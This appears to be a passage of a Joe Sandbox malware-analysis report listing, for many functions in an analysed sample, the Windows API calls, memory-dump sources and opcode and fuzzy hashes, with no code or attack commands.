• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 1487c938a1883322138918ab11b2fab4b30586663252fb832d0bd27a0ba43cda
• Instruction ID: c73aa681a3bab9e1240cd5a1987e5ec90d6131979061857c876dd0c0189b80e3
• Opcode Fuzzy Hash: 1487c938a1883322138918ab11b2fab4b30586663252fb832d0bd27a0ba43cda
• Instruction Fuzzy Hash: 3B5106B19097808EDB44DF2A94807C97BE0AF59300F0896BEDD4DDF6ABDB740204CB61
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E6B3E8
  • Part of subcall function 00E6F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?,?,?,?), ref: 00E6F739
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: CloseFindH_prolog3_
• String ID:
• API String ID: 2672038326-0
• Opcode ID: cae28af075c4be7eec8852e5c30424f5a40030b4208c51fea14eb04087ab5237
• Instruction ID: 7df746a0cf439a093c86953dbeb1290350ce16080bcd0d10f73c292dc29e4ed2
• Opcode Fuzzy Hash: cae28af075c4be7eec8852e5c30424f5a40030b4208c51fea14eb04087ab5237
• Instruction Fuzzy Hash: 46415C709406088FDB20DFA9E8816E9B7F1BF45348F14546DE15AEB252EB30A885CB25
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E62C37
  • Part of subcall function 00E7880E: __EH_prolog3.LIBCMT ref: 00E78815
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3H_prolog3_
• String ID:
• API String ID: 3355343447-0
• Opcode ID: d994bb52f1059906c1fd6a669863cdcb0dcc3cfb16407173707b9b1266582046
• Instruction ID: 49b1d005d7b2f6d3b2e72b971a78e94796925e04d92bcdd8f292a5eaf1be9fa4
• Opcode Fuzzy Hash: d994bb52f1059906c1fd6a669863cdcb0dcc3cfb16407173707b9b1266582046
• Instruction Fuzzy Hash: A1314A7194060CAFCF19EBE4E8859EEBBF9AF18380F54642EF505B7251CB319985CB20
APIs
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 0f7616d96a8e3db80c440df45e29b1f3a078db65cc25ac51f6e62ae06e9d0da6
• Instruction ID: 427fb9ebe1f1e9b2d3394ae5493e2523e6a7b386b51ff077879c494d25a42c09
• Opcode Fuzzy Hash: 0f7616d96a8e3db80c440df45e29b1f3a078db65cc25ac51f6e62ae06e9d0da6
• Instruction Fuzzy Hash: F521F571D016129BEF1CAF748C4AA5E76A8BF05314F05613AE50DBB2C2EB749940C7E5
APIs
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
APIs
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
APIs
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
APIs
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
APIs
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
APIs
• RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 00E6F826: __EH_prolog3_GS.LIBCMT ref: 00E6F830
  • Part of subcall function 00E6F826: FindFirstFileW.KERNELBASE(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F859
  • Part of subcall function 00E6F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F8A4
  • Part of subcall function 00E6F826: GetLastError.KERNEL32(?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F902
• FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?,?,?,?), ref: 00E6F739
Similarity
• API ID: Find$FileFirst$CloseErrorH_prolog3_Last
• String ID:
• API String ID: 765066492-0
APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 00E7742D
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00E61206
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 00E7EB0C
  • Part of subcall function 00E7E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E7E86A
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00E84256
  • Part of subcall function 00E80678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
  • Part of subcall function 00E80678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
  • Part of subcall function 00E80678: IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
  • Part of subcall function 00E80678: TranslateMessage.USER32(?), ref: 00E806BC
  • Part of subcall function 00E80678: DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: d8f83d761b3b0a51720e0ee59a724cd1f0a8b8b123f8fc25faa00ffc743b80bb
                                                                                              • Instruction ID: 2c88159e303aa3c1e9f9be0b463ee84b2f62bb99343bf14c9c9f9bbed65a0fcb
                                                                                              • Opcode Fuzzy Hash: d8f83d761b3b0a51720e0ee59a724cd1f0a8b8b123f8fc25faa00ffc743b80bb
                                                                                              • Instruction Fuzzy Hash: 5AD09E32144200AED6523B52DE06F0A7AE2AB88B04F004655B349344B1C6629E34AB12
                                                                                              APIs
                                                                                                • Part of subcall function 00E84DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00E84DF2
                                                                                              • DloadProtectSection.DELAYIMP ref: 00E84D54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 3680172570-0
                                                                                              • Opcode ID: 38977446e5eb24aba668435e13c772502de584bd3a984eb466a14326ec3162f9
                                                                                              • Instruction ID: b2dd695d145884203554497a8360c67d060a156532c76119ba75e213fc3d5347
                                                                                              • Opcode Fuzzy Hash: 38977446e5eb24aba668435e13c772502de584bd3a984eb466a14326ec3162f9
                                                                                              • Instruction Fuzzy Hash: E8D0C9B62406629EC613BB669C4A7566290F34430CB952B46E25DB61E4CB6444549701
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E68187
                                                                                                • Part of subcall function 00E74F2B: __EH_prolog3.LIBCMT ref: 00E74F32
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 13ee96b44cccd51dce69e90cc2396c5679ac1f8e010f29b13bce1171d4543b79
                                                                                              • Instruction ID: 4434e2f8747ccb1393ba4da9fa5db0fb38b2f15171b14e4bbe490ee1feea284d
                                                                                              • Opcode Fuzzy Hash: 13ee96b44cccd51dce69e90cc2396c5679ac1f8e010f29b13bce1171d4543b79
                                                                                              • Instruction Fuzzy Hash: 73C012F2B5092483DF067F54940375C11905B44B02F40A14DF1087B283CF790A0183CA
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00E6E052,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E15E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: e5b3a5862e2136380ebc2c1c43ec4f051d4b4f1bafe789a688d4f769d75529ae
                                                                                              • Instruction ID: d775cedd22e2554b9f91575b78b4fef729b70cf8d63c140d563085f6d81c4dc6
                                                                                              • Opcode Fuzzy Hash: e5b3a5862e2136380ebc2c1c43ec4f051d4b4f1bafe789a688d4f769d75529ae
                                                                                              • Instruction Fuzzy Hash: 3AC01238041105C68E200624AC4405973119A533E97B4A395C028A52E2C3328C87F600
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 28b4959d3cc6b8175f25f3a467e54f8c6e3eab2f3121209fe02690425a4891e0
                                                                                              • Instruction ID: 2b98d9b7390d0e5b681cdcb782e95a44e83819685292c2e432f09dade41e27d7
                                                                                              • Opcode Fuzzy Hash: 28b4959d3cc6b8175f25f3a467e54f8c6e3eab2f3121209fe02690425a4891e0
                                                                                              • Instruction Fuzzy Hash: C9B012D235C212EC3104B1491D03E77018CC0C5B10330B11FF44CF51D1D440AC801231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5384a7f3145eb1f7b2fa1691f403b0499d2fab93041f9fef7409c0ba9033b956
                                                                                              • Instruction ID: df3747515ce07ea5796764fd72bb87212843763e056d5ed4a8d230039f60cd09
                                                                                              • Opcode Fuzzy Hash: 5384a7f3145eb1f7b2fa1691f403b0499d2fab93041f9fef7409c0ba9033b956
                                                                                              • Instruction Fuzzy Hash: FBB012D235C112AC3104B1095E03E77118CC1C5B10330B31FF24CF50D1D4405C810231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c28bb74d83c3bf0453d5eaca576348dc08ef9b2470db45e35b01d8c1f3e4dffa
                                                                                              • Instruction ID: 42de81f4a3266069e3663a8939bf9ca905fd0d547bb6f66474e079d44e31ebbf
                                                                                              • Opcode Fuzzy Hash: c28bb74d83c3bf0453d5eaca576348dc08ef9b2470db45e35b01d8c1f3e4dffa
                                                                                              • Instruction Fuzzy Hash: 5FB012D235C212AC3204B1095D03E77018CC0C5B10330731FF14CF50D1D4405CC40231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: cf0637990a2195839dafebd726ee6e2cb2d13a0279f1f1ec5556808dad935037
                                                                                              • Instruction ID: 0c847cbd74264c7107cf70ab9213c079e18996f6bd16b47dd70313bf3dc004b9
                                                                                              • Opcode Fuzzy Hash: cf0637990a2195839dafebd726ee6e2cb2d13a0279f1f1ec5556808dad935037
                                                                                              • Instruction Fuzzy Hash: 9DB012D235D112AC3204B1191E03D77014CC1C5B10332B12FF18CF54C1D4401C450231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c5975fe83ebc523f7c090d0385510b36e0568729d2247069564f1a907efc8808
                                                                                              • Instruction ID: eb4afe0f21f9dd1253b406d4911637f20b36c99c88dcd5691e2aab367812c8ee
                                                                                              • Opcode Fuzzy Hash: c5975fe83ebc523f7c090d0385510b36e0568729d2247069564f1a907efc8808
                                                                                              • Instruction Fuzzy Hash: B8B012D235D113AC3204B1191D03E77014CC0C5B10332712FF08CF58C1D4401C440231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 23abf720c903b695e480aa29f4d76f5bcc7bc9f3867e2de119a91e1aa749503c
                                                                                              • Instruction ID: 44aac8c10130321eed95e1928643a63c930f4fa9ff4f5532e0e1775b8fc9d469
                                                                                              • Opcode Fuzzy Hash: 23abf720c903b695e480aa29f4d76f5bcc7bc9f3867e2de119a91e1aa749503c
                                                                                              • Instruction Fuzzy Hash: 6DB012D235D112EC3204B1291D03D77014CC0C5B10332B12FF48CF54C1D4401C440231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a3677c1afc9a1e81bc02daa16fe75248613847d67ac80be132a586bdf9fc609e
                                                                                              • Instruction ID: 0f526e82e43a295a07567c7177db240a081406f6fab36e34f11e017c2d92ae9b
                                                                                              • Opcode Fuzzy Hash: a3677c1afc9a1e81bc02daa16fe75248613847d67ac80be132a586bdf9fc609e
                                                                                              • Instruction Fuzzy Hash: D7B012C639D112BC320471051F03C77010CC9D1B11332B21FF1CCF44C294401C410131
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 91136286cb4673eb5af1e6b45f149c4a243f74cfb6c86e82de8fd43e79c18ce1
                                                                                              • Instruction ID: 6d2ddf604f7962b1dcb1d8931ef73803c571ba99a850ac0287bd1f150970cef7
                                                                                              • Opcode Fuzzy Hash: 91136286cb4673eb5af1e6b45f149c4a243f74cfb6c86e82de8fd43e79c18ce1
